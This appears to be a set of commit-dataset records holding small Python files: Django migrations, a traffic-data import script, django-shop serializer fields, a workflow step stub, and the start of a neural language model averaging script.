feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
<commit_before><commit_msg>Add example features and permissions<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def create_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Permission = apps.get_model("auth", "Permission")
for slug, name, perms in (
('blog', 'Blog', [
'view_post',
'add_post',
'change_post',
'delete_post',
'moderate_post',
]),
('messaging', 'Messaging', ['can_message'])
):
feature = Feature.objects.create(slug=slug, name=name)
for perm in perms:
feature.permissions.add(Permission.objects.get(codename=perm))
def delete_features(apps, schema_editor):
Feature = apps.get_model("engage", "Feature")
Feature.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('engage', '0001_initial'),
]
operations = [
migrations.RunPython(create_features, delete_features),
]
|
|
6b0f2e47ee249e9923539b07ca31629b11ce5d73
|
studygroups/migrations/0094_update_venue_website.py
|
studygroups/migrations/0094_update_venue_website.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
Add migration to fix URLs for studygroup venue websites
|
Add migration to fix URLs for studygroup venue websites
|
Python
|
mit
|
p2pu/learning-circles,p2pu/learning-circles,p2pu/learning-circles,p2pu/learning-circles
|
Add migration to fix URLs for studygroup venue websites
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
<commit_before><commit_msg>Add migration to fix URLs for studygroup venue websites<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
Add migration to fix URLs for studygroup venue websites# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
<commit_before><commit_msg>Add migration to fix URLs for studygroup venue websites<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-07-24 11:42
from __future__ import unicode_literals
from django.db import migrations
def prepend_http(apps, schema_editor):
StudyGroup = apps.get_model("studygroups", "StudyGroup")
study_groups = StudyGroup.objects.all().exclude(venue_website='')
study_groups = study_groups.exclude(venue_website__startswith='http')
for study_group in study_groups:
study_group.venue_website = 'http://{}'.format(study_group.venue_website)
study_group.save()
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0093_application_mobile_opt_out_at'),
]
operations = [
migrations.RunPython(prepend_http),
]
|
|
9ba8756648a1c9ab322f417e9d2ab1aa75d0a2ea
|
reg/migrations/0006_auto_20151023_1826.py
|
reg/migrations/0006_auto_20151023_1826.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
Make migrations for leader_email field of Team model
|
Make migrations for leader_email field of Team model
|
Python
|
bsd-3-clause
|
stefantsov/blackbox3,stefantsov/blackbox3,stefantsov/blackbox3
|
Make migrations for leader_email field of Team model
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Make migrations for leader_email field of Team model<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
Make migrations for leader_email field of Team model# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Make migrations for leader_email field of Team model<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reg', '0005_auto_20150420_2353'),
]
operations = [
migrations.AlterField(
model_name='team',
name='leader_email',
field=models.EmailField(max_length=75, blank=True),
preserve_default=True,
),
]
|
|
339a25141532b0831a2fcfb621a1a7b1d6e88ac8
|
scripts/ingestors/rwis/archive_process_traffic.py
|
scripts/ingestors/rwis/archive_process_traffic.py
|
# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb
RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()
def clean(v):
if v.strip() == '':
return '\N'
return v
def dofile(fp):
"""
Actually process a file please
"""
ts0 = None
o = StringIO.StringIO()
for line in open(fp):
if line.strip() == "":
continue
tokens = line.replace('%','').replace(' ','').split(",")
id = int(tokens[0]) - 512000
nwsli = mesonet.RWISconvert['%02i' % (id,)]
sensor_id = tokens[1]
lane_id = tokens[2]
ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
if ts0 is None:
ts0 = ts
sped = clean( tokens[4] )
vol = clean( tokens[5] )
norm_vol = clean( tokens[6] )
long_vol = clean( tokens[7] )
headway = clean( tokens[8] )
occupancy = clean( tokens[9] )
o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
norm_vol, long_vol, occupancy) )
o.seek(0)
if ts0 is None:
return
# Now we delete old obs
rcursor.execute("""
DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
""" % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
ts0.strftime('%Y-%m-01')))
rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
RWIS.commit()
del o
def process_folder():
"""
Do the necessary work to process the files in a folder
"""
os.chdir('process')
for file in glob.glob("export*traffic*.csv"):
dofile( file )
if __name__ == '__main__':
process_folder()
RWIS.close()
|
Add an archive traffic processor, yippee
|
Add an archive traffic processor, yippee
|
Python
|
mit
|
akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem
|
Add an archive traffic processor, yippee
|
# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb
RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()
def clean(v):
if v.strip() == '':
return '\N'
return v
def dofile(fp):
"""
Actually process a file please
"""
ts0 = None
o = StringIO.StringIO()
for line in open(fp):
if line.strip() == "":
continue
tokens = line.replace('%','').replace(' ','').split(",")
id = int(tokens[0]) - 512000
nwsli = mesonet.RWISconvert['%02i' % (id,)]
sensor_id = tokens[1]
lane_id = tokens[2]
ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
if ts0 is None:
ts0 = ts
sped = clean( tokens[4] )
vol = clean( tokens[5] )
norm_vol = clean( tokens[6] )
long_vol = clean( tokens[7] )
headway = clean( tokens[8] )
occupancy = clean( tokens[9] )
o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
norm_vol, long_vol, occupancy) )
o.seek(0)
if ts0 is None:
return
# Now we delete old obs
rcursor.execute("""
DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
""" % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
ts0.strftime('%Y-%m-01')))
rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
RWIS.commit()
del o
def process_folder():
"""
Do the necessary work to process the files in a folder
"""
os.chdir('process')
for file in glob.glob("export*traffic*.csv"):
dofile( file )
if __name__ == '__main__':
process_folder()
RWIS.close()
|
<commit_before><commit_msg>Add an archive traffic processor, yippee<commit_after>
|
# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb
RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()
def clean(v):
if v.strip() == '':
return '\N'
return v
def dofile(fp):
"""
Actually process a file please
"""
ts0 = None
o = StringIO.StringIO()
for line in open(fp):
if line.strip() == "":
continue
tokens = line.replace('%','').replace(' ','').split(",")
id = int(tokens[0]) - 512000
nwsli = mesonet.RWISconvert['%02i' % (id,)]
sensor_id = tokens[1]
lane_id = tokens[2]
ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
if ts0 is None:
ts0 = ts
sped = clean( tokens[4] )
vol = clean( tokens[5] )
norm_vol = clean( tokens[6] )
long_vol = clean( tokens[7] )
headway = clean( tokens[8] )
occupancy = clean( tokens[9] )
o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
norm_vol, long_vol, occupancy) )
o.seek(0)
if ts0 is None:
return
# Now we delete old obs
rcursor.execute("""
DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
""" % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
ts0.strftime('%Y-%m-01')))
rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
RWIS.commit()
del o
def process_folder():
"""
Do the necessary work to process the files in a folder
"""
os.chdir('process')
for file in glob.glob("export*traffic*.csv"):
dofile( file )
if __name__ == '__main__':
process_folder()
RWIS.close()
|
Add an archive traffic processor, yippee# Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb
RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()
def clean(v):
if v.strip() == '':
return '\N'
return v
def dofile(fp):
"""
Actually process a file please
"""
ts0 = None
o = StringIO.StringIO()
for line in open(fp):
if line.strip() == "":
continue
tokens = line.replace('%','').replace(' ','').split(",")
id = int(tokens[0]) - 512000
nwsli = mesonet.RWISconvert['%02i' % (id,)]
sensor_id = tokens[1]
lane_id = tokens[2]
ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
if ts0 is None:
ts0 = ts
sped = clean( tokens[4] )
vol = clean( tokens[5] )
norm_vol = clean( tokens[6] )
long_vol = clean( tokens[7] )
headway = clean( tokens[8] )
occupancy = clean( tokens[9] )
o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
norm_vol, long_vol, occupancy) )
o.seek(0)
if ts0 is None:
return
# Now we delete old obs
rcursor.execute("""
DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
""" % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
ts0.strftime('%Y-%m-01')))
rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
RWIS.commit()
del o
def process_folder():
"""
Do the necessary work to process the files in a folder
"""
os.chdir('process')
for file in glob.glob("export*traffic*.csv"):
dofile( file )
if __name__ == '__main__':
process_folder()
RWIS.close()
|
<commit_before><commit_msg>Add an archive traffic processor, yippee<commit_after># Need something to process the archived monthly RWIS file provided by Tina
"""
Site number,sensor ID,lane ID,local date/time,2-minute av speed,total
vol,normal vol,long vol,headway (null),occupancy,
"""
import glob
import os
import mx.DateTime
import StringIO
from pyIEM import mesonet
import iemdb
RWIS = iemdb.connect('rwis')
rcursor = RWIS.cursor()
def clean(v):
if v.strip() == '':
return '\N'
return v
def dofile(fp):
"""
Actually process a file please
"""
ts0 = None
o = StringIO.StringIO()
for line in open(fp):
if line.strip() == "":
continue
tokens = line.replace('%','').replace(' ','').split(",")
id = int(tokens[0]) - 512000
nwsli = mesonet.RWISconvert['%02i' % (id,)]
sensor_id = tokens[1]
lane_id = tokens[2]
ts = mx.DateTime.strptime(tokens[3], '%m/%d/%Y %H:%M')
if ts0 is None:
ts0 = ts
sped = clean( tokens[4] )
vol = clean( tokens[5] )
norm_vol = clean( tokens[6] )
long_vol = clean( tokens[7] )
headway = clean( tokens[8] )
occupancy = clean( tokens[9] )
o.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (nwsli,
ts.strftime("%Y-%m-%d %H:%M"), lane_id, sped, headway,
norm_vol, long_vol, occupancy) )
o.seek(0)
if ts0 is None:
return
# Now we delete old obs
rcursor.execute("""
DELETE from t%s_traffic WHERE station = '%s' and lane_id = %s and
valid >= '%s' and valid < ('%s'::timestamp + '1 month'::interval)
""" % (ts0.year, nwsli, lane_id, ts0.strftime('%Y-%m-01'),
ts0.strftime('%Y-%m-01')))
rcursor.copy_from(o, 't%s_traffic' % (ts.year,))
RWIS.commit()
del o
def process_folder():
"""
Do the necessary work to process the files in a folder
"""
os.chdir('process')
for file in glob.glob("export*traffic*.csv"):
dofile( file )
if __name__ == '__main__':
process_folder()
RWIS.close()
|
|
dc181cd45adba6433c2422b9550e398c6385bca5
|
shop/serializers/catalog.py
|
shop/serializers/catalog.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers
class CMSPagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductPage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
cms_pages = CMSPagesField()
...
"""
def to_representation(self, value):
urls = {page.get_absolute_url() for page in value.all()}
return list(urls)
def to_internal_value(self, data):
site = get_current_site()
pages_root = reverse('pages-root')
ret = []
for path in data:
if path.startswith(pages_root):
path = path[len(pages_root):]
# strip any final slash
if path.endswith('/'):
path = path[:-1]
page = get_page_from_path(site, path)
if page:
ret.append(page)
return ret
class ImagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductImage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
images = ImagesField()
...
"""
def to_representation(self, value):
return list(value.values_list('pk', flat=True))
def to_internal_value(self, data):
return list(Image.objects.filter(pk__in=data))
class ValueRelatedField(serializers.RelatedField):
"""
A serializer field used to access a single value from a related model.
Usage:
myfield = ValueRelatedField(model=MyModel)
myfield = ValueRelatedField(model=MyModel, field_name='myfield')
This serializes objects of type ``MyModel`` so that that the return data is a simple scalar.
On deserialization it creates an object of type ``MyModel``, if none could be found with the
given field name.
"""
def __init__(self, *args, **kwargs):
self.model = kwargs.pop('model')
self.related_field_name = kwargs.pop('field_name', 'name')
super(ValueRelatedField, self).__init__(*args, **kwargs)
def get_queryset(self):
return self.model.objects.all()
def to_representation(self, value):
return getattr(value, self.related_field_name)
def to_internal_value(self, value):
data = {self.related_field_name: value}
instance, _ = self.model.objects.get_or_create(**data)
return instance
|
Create M2M serializers for export/import of products
|
Create M2M serializers for export/import of products
|
Python
|
bsd-3-clause
|
awesto/django-shop,divio/django-shop,divio/django-shop,awesto/django-shop,awesto/django-shop,divio/django-shop
|
Create M2M serializers for export/import of products
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers
class CMSPagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductPage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
cms_pages = CMSPagesField()
...
"""
def to_representation(self, value):
urls = {page.get_absolute_url() for page in value.all()}
return list(urls)
def to_internal_value(self, data):
site = get_current_site()
pages_root = reverse('pages-root')
ret = []
for path in data:
if path.startswith(pages_root):
path = path[len(pages_root):]
# strip any final slash
if path.endswith('/'):
path = path[:-1]
page = get_page_from_path(site, path)
if page:
ret.append(page)
return ret
class ImagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductImage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
images = ImagesField()
...
"""
def to_representation(self, value):
return list(value.values_list('pk', flat=True))
def to_internal_value(self, data):
return list(Image.objects.filter(pk__in=data))
class ValueRelatedField(serializers.RelatedField):
"""
A serializer field used to access a single value from a related model.
Usage:
myfield = ValueRelatedField(model=MyModel)
myfield = ValueRelatedField(model=MyModel, field_name='myfield')
This serializes objects of type ``MyModel`` so that that the return data is a simple scalar.
On deserialization it creates an object of type ``MyModel``, if none could be found with the
given field name.
"""
def __init__(self, *args, **kwargs):
self.model = kwargs.pop('model')
self.related_field_name = kwargs.pop('field_name', 'name')
super(ValueRelatedField, self).__init__(*args, **kwargs)
def get_queryset(self):
return self.model.objects.all()
def to_representation(self, value):
return getattr(value, self.related_field_name)
def to_internal_value(self, value):
data = {self.related_field_name: value}
instance, _ = self.model.objects.get_or_create(**data)
return instance
|
<commit_before><commit_msg>Create M2M serializers for export/import of products<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers
class CMSPagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductPage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
cms_pages = CMSPagesField()
...
"""
def to_representation(self, value):
urls = {page.get_absolute_url() for page in value.all()}
return list(urls)
def to_internal_value(self, data):
site = get_current_site()
pages_root = reverse('pages-root')
ret = []
for path in data:
if path.startswith(pages_root):
path = path[len(pages_root):]
# strip any final slash
if path.endswith('/'):
path = path[:-1]
page = get_page_from_path(site, path)
if page:
ret.append(page)
return ret
class ImagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductImage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
images = ImagesField()
...
"""
def to_representation(self, value):
return list(value.values_list('pk', flat=True))
def to_internal_value(self, data):
return list(Image.objects.filter(pk__in=data))
class ValueRelatedField(serializers.RelatedField):
"""
A serializer field used to access a single value from a related model.
Usage:
myfield = ValueRelatedField(model=MyModel)
myfield = ValueRelatedField(model=MyModel, field_name='myfield')
This serializes objects of type ``MyModel`` so that that the return data is a simple scalar.
On deserialization it creates an object of type ``MyModel``, if none could be found with the
given field name.
"""
def __init__(self, *args, **kwargs):
self.model = kwargs.pop('model')
self.related_field_name = kwargs.pop('field_name', 'name')
super(ValueRelatedField, self).__init__(*args, **kwargs)
def get_queryset(self):
return self.model.objects.all()
def to_representation(self, value):
return getattr(value, self.related_field_name)
def to_internal_value(self, value):
data = {self.related_field_name: value}
instance, _ = self.model.objects.get_or_create(**data)
return instance
|
Create M2M serializers for export/import of products# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers
class CMSPagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductPage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
cms_pages = CMSPagesField()
...
"""
def to_representation(self, value):
urls = {page.get_absolute_url() for page in value.all()}
return list(urls)
def to_internal_value(self, data):
site = get_current_site()
pages_root = reverse('pages-root')
ret = []
for path in data:
if path.startswith(pages_root):
path = path[len(pages_root):]
# strip any final slash
if path.endswith('/'):
path = path[:-1]
page = get_page_from_path(site, path)
if page:
ret.append(page)
return ret
class ImagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductImage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
images = ImagesField()
...
"""
def to_representation(self, value):
return list(value.values_list('pk', flat=True))
def to_internal_value(self, data):
return list(Image.objects.filter(pk__in=data))
class ValueRelatedField(serializers.RelatedField):
"""
A serializer field used to access a single value from a related model.
Usage:
myfield = ValueRelatedField(model=MyModel)
myfield = ValueRelatedField(model=MyModel, field_name='myfield')
This serializes objects of type ``MyModel`` so that that the return data is a simple scalar.
On deserialization it creates an object of type ``MyModel``, if none could be found with the
given field name.
"""
def __init__(self, *args, **kwargs):
self.model = kwargs.pop('model')
self.related_field_name = kwargs.pop('field_name', 'name')
super(ValueRelatedField, self).__init__(*args, **kwargs)
def get_queryset(self):
return self.model.objects.all()
def to_representation(self, value):
return getattr(value, self.related_field_name)
def to_internal_value(self, value):
data = {self.related_field_name: value}
instance, _ = self.model.objects.get_or_create(**data)
return instance
|
<commit_before><commit_msg>Create M2M serializers for export/import of products<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from django.core.urlresolvers import reverse
from filer.models.imagemodels import Image
from rest_framework import serializers
class CMSPagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductPage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
cms_pages = CMSPagesField()
...
"""
def to_representation(self, value):
urls = {page.get_absolute_url() for page in value.all()}
return list(urls)
def to_internal_value(self, data):
site = get_current_site()
pages_root = reverse('pages-root')
ret = []
for path in data:
if path.startswith(pages_root):
path = path[len(pages_root):]
# strip any final slash
if path.endswith('/'):
path = path[:-1]
page = get_page_from_path(site, path)
if page:
ret.append(page)
return ret
class ImagesField(serializers.Field):
"""
A serializer field used to create the many-to-many relations for models inheriting from the
unmanaged :class:`shop.models.related.BaseProductImage`.
Usage in serializers to import/export product model data:
class MyProductSerializer():
...
images = ImagesField()
...
"""
def to_representation(self, value):
return list(value.values_list('pk', flat=True))
def to_internal_value(self, data):
return list(Image.objects.filter(pk__in=data))
class ValueRelatedField(serializers.RelatedField):
"""
A serializer field used to access a single value from a related model.
Usage:
myfield = ValueRelatedField(model=MyModel)
myfield = ValueRelatedField(model=MyModel, field_name='myfield')
This serializes objects of type ``MyModel`` so that that the return data is a simple scalar.
On deserialization it creates an object of type ``MyModel``, if none could be found with the
given field name.
"""
def __init__(self, *args, **kwargs):
self.model = kwargs.pop('model')
self.related_field_name = kwargs.pop('field_name', 'name')
super(ValueRelatedField, self).__init__(*args, **kwargs)
def get_queryset(self):
return self.model.objects.all()
def to_representation(self, value):
return getattr(value, self.related_field_name)
def to_internal_value(self, value):
data = {self.related_field_name: value}
instance, _ = self.model.objects.get_or_create(**data)
return instance
|
|
0c69ade79a3e83024c69698a0cb3eae775d8082d
|
dbaas/workflow/steps/util/region_migration/check_instances_status.py
|
dbaas/workflow/steps/util/region_migration/check_instances_status.py
|
# -*- coding: utf-8 -*-
import logging
from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020
LOG = logging.getLogger(__name__)
class DecreaseTTL(BaseStep):
def __unicode__(self):
return "Checking instances status..."
def do(self, workflow_dict):
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
def undo(self, workflow_dict):
LOG.info("Running undo...")
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
|
Remove unused imports and change exception handling
|
Remove unused imports and change exception handling
|
Python
|
bsd-3-clause
|
globocom/database-as-a-service,globocom/database-as-a-service,globocom/database-as-a-service,globocom/database-as-a-service
|
Remove unused imports and change exception handling
|
# -*- coding: utf-8 -*-
import logging
from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020
LOG = logging.getLogger(__name__)
class DecreaseTTL(BaseStep):
def __unicode__(self):
return "Checking instances status..."
def do(self, workflow_dict):
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
def undo(self, workflow_dict):
LOG.info("Running undo...")
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
|
<commit_before><commit_msg>Remove unused imports and change exception handling<commit_after>
|
# -*- coding: utf-8 -*-
import logging
from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020
LOG = logging.getLogger(__name__)
class DecreaseTTL(BaseStep):
def __unicode__(self):
return "Checking instances status..."
def do(self, workflow_dict):
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
def undo(self, workflow_dict):
LOG.info("Running undo...")
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
|
Remove unused imports and change exception handling# -*- coding: utf-8 -*-
import logging
from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020
LOG = logging.getLogger(__name__)
class DecreaseTTL(BaseStep):
def __unicode__(self):
return "Checking instances status..."
def do(self, workflow_dict):
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
def undo(self, workflow_dict):
LOG.info("Running undo...")
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
|
<commit_before><commit_msg>Remove unused imports and change exception handling<commit_after># -*- coding: utf-8 -*-
import logging
from util import full_stack
from workflow.steps.util.base import BaseStep
from workflow.exceptions.error_codes import DBAAS_0020
LOG = logging.getLogger(__name__)
class DecreaseTTL(BaseStep):
def __unicode__(self):
return "Checking instances status..."
def do(self, workflow_dict):
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
def undo(self, workflow_dict):
LOG.info("Running undo...")
try:
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0020)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
|
|
0451142ecede6f899b97b28114843413332e3f0b
|
scripts/nplm-training/averageNullEmbedding_baseline.py
|
scripts/nplm-training/averageNullEmbedding_baseline.py
|
#!/usr/bin/env python2
import sys
import numpy
import optparse
#sys.path.append('/data/tools/nplm/python')
parser = optparse.OptionParser("%prog [options]")
parser.add_option("-p", "--nplm-python-path", type="string", dest="nplm_python_path")
parser.add_option("-i", "--input-model", type="string", dest="input_model")
parser.add_option("-o", "--output-model", type="string", dest="output_model")
